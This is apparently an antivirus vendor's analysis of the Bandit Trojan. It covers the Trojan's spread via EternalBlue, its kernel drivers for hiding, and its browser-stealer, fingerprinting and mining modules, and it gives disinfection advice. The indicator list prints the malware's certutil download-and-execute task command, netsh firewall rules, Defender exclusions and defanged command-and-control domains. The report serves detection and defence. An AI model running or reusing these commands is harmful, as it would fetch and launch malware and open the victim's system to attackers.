General explanation
Type: Trojan
Degree of destruction: high
Prevalence: high
Names of the malware:
- Trojan.Win32.Bandit.ApLib (Padvish)
- HEUR:Trojan.Win32.Chapak.pef (Kaspersky)
- TR/AD.GoCloudnet.irwn ( Avira)
What is a Trojan?
Trojans are malware types that introduced themselves as healthy and legal software and acted similarly to useful and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching it to an email, etc. are ways that trojans use to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible.
What is Bandit Trojan?
Bandit is a Trojan that hides its files and processes using low-level techniques of Windows (kernel). This malware uses EternalBlue for distribution. Then, it will download different modules connected to the command and control server and executes them on the victim’s system.
Technical explanation
Signs of infection
- TestApp registry key with malicious domains in the following sub-keys.
- Two scheduled tasks are as follows one of them will execute the malware update file, and the other with executing the file of the malware on the system
name : ScheduledUpdate
command : "cmd.exe /C certutil.exe -urlcache –split –f hxxps://bestblues[.]tech/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340"
scheduled : ONLOGON
name : csrss
command : "C:\Windows\rss\csrss.exe"
scheduled : ONLOGON
- The sub-key in the Run registry key which is executing the “C:\Windows\rss\csrss.exe” file
- The following suspicious Firewall laws:
Cmd.exe /c “netsh advfirewall firewall add rule name=”csrss” dir=”in” action=allow program=”C:\Windows\rss\csrss.exe” enable=yes”
Cmd.exe /c “netsh advfirewall firewall add rule name=”csrss” dir=”in” action=allow program=”%AppData%Roaming\EpicNet Inc\CloudNet\cloudnet.exe” enable=yes”
- The following items in the Windows Defender exception list
• Files/Directories:
C:\Windows
C:\Windows\rss
AppData%Roaming\EpicNet Inc\CloudNet
AppData%Local\Temp\csrss
AppData%\Roaming\WisprPine
C:\Windows\Windefender
AppData%Local\Temp\Wup
C:\Windows\System32\drivers
• Processes: csrss.exe , cloudnet.exe , windefender.exe
Explaining the action
Performing the technique of identification Sandbox and VM
The malware tries to execute techniques to understand whether the execution environment is VM or Sandbox. It will stop the execution if it detects the environment.
Malicious sub-key of TestApp registry key
As mentioned before, the malware will create a key with the name of TestApp in the HKCU\software\microsoft\TestApp. In this case, the mentioned key has many sub-keys such as the following items (the amounts of this sub-key, especially the server addresses” will possibly be different. Also, in the new type of this malware, it will use random strings such as “dd47a129” in replace of “TestApp”):
Key : HKCU\software\microsoft\TestApp
Subkeys :
Uuid = ""
command = ""
FirstInstallDate = "56268135e"
ServiceVersion = ""
SC = ""
PGDSE = ""
VC = ""
ServerVersion = "94"
CDN = "hxxps://bestblues[.]tech"
PP = ""
name = "SmallSea"
servers = "hxxps;//whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com"
firewall = ""
defender = ""
Creating the csrss processes
The malware will create the C:\Windows\rss directory and turns it into a hidden directory, after executing techniques for upgrading the access level. Then, it will copy its file in this path with this name: csrss.exe.
Distribution in the local network
This malware uses tools related to EternalBlue and DoublePulsar vulnerabilities for distribution. Systems with vulnerable versions detect the SMB protocols at the network level and by using this vulnerability, will execute its malware on it.
Downloading Drivers
Malware will create and run three drives:
- Winmon.sys drive: this drive is used to hide malware processes
- WinmonFs.sys drive: this drive hides the directory/files of the malware from the sight of antiviruses and monitoring tools.
- WinmonProcessMonitor drive: this drive has a long list of the name of processes related to system monitoring products, antiviruses, etc. and it will survey the name of the new processes does not involve in this list when creating each process on the system. Otherwise, it will end the execution of the malware.
Downloading and executing malware module
- Browser Stealer module: this module steals cookies, history, and local storage of browsers such as Chrome, Coccoc, Firefox, Opera, and Yandex and it will send them to the server in the format of a zip file
- Router Exploit Module: this module executes to sue the rooter’s vulnerabilities on the network level.
- Collectchromefingerprint: this module analyzes whether the Chrome browser is installed on the system. It will open the following link in the browser if it is installed on the system.
hxxps://swebgames[.]site/test.php?uuid=a1058f4a-2f08-4679-baf2-ae6c436cfaa5&browser=chrome
This link is a blank page that in the background will execute a JavaScript library “DetectRTC” with the link of https://github.com/muaz-khan/DetectRTC and analyze the features of WebRTC such as whether the victim’s system has a Microphone, Speaker, Webcam; the number of media systems, the possibility for snapshot, etc. and send the results to the following path:
hxxps://swebgames[.]site/fp.php
4. bot module: this module will register the victim’s system in the malware servers and then will connect it many times. Obtaining a list of active pools of the bitcoin network and connecting with them to perform mining cryptocurrencies on the victim’s service is one of these connections.
How to deal with it and disinfect the system
Padvish Antivirus detects and disinfects this malware. To prevent any possible infection by malware that uses EternalBlue vulnerability, it is recommended to use the provided security patch ms17-010 from Microsoft Co. Padvish IPS will detect malware that uses this kind of vulnerability and will prevent them from entering the system.